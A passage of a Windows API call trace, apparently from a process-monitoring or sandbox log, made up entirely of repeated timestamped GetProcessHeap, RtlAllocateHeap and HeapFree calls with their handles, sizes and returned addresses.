GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f558 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0xec8178 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9f558 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xedca08 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8178 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.184] GetProcessHeap () returned 0xe30000 [0090.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0090.185] GetProcessHeap () returned 0xe30000 [0090.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0090.185] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.186] GetProcessHeap () returned 0xe30000 [0090.186] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.186] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dac8 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0090.187] GetProcessHeap () returned 0xe30000 [0090.187] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.187] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0090.188] GetProcessHeap () returned 0xe30000 [0090.188] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0090.188] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0090.189] GetProcessHeap () returned 0xe30000 [0090.189] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0090.189] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.190] GetProcessHeap () returned 0xe30000 [0090.190] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0090.191] GetProcessHeap () returned 0xe30000 [0090.191] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0090.192] GetProcessHeap () returned 0xe30000 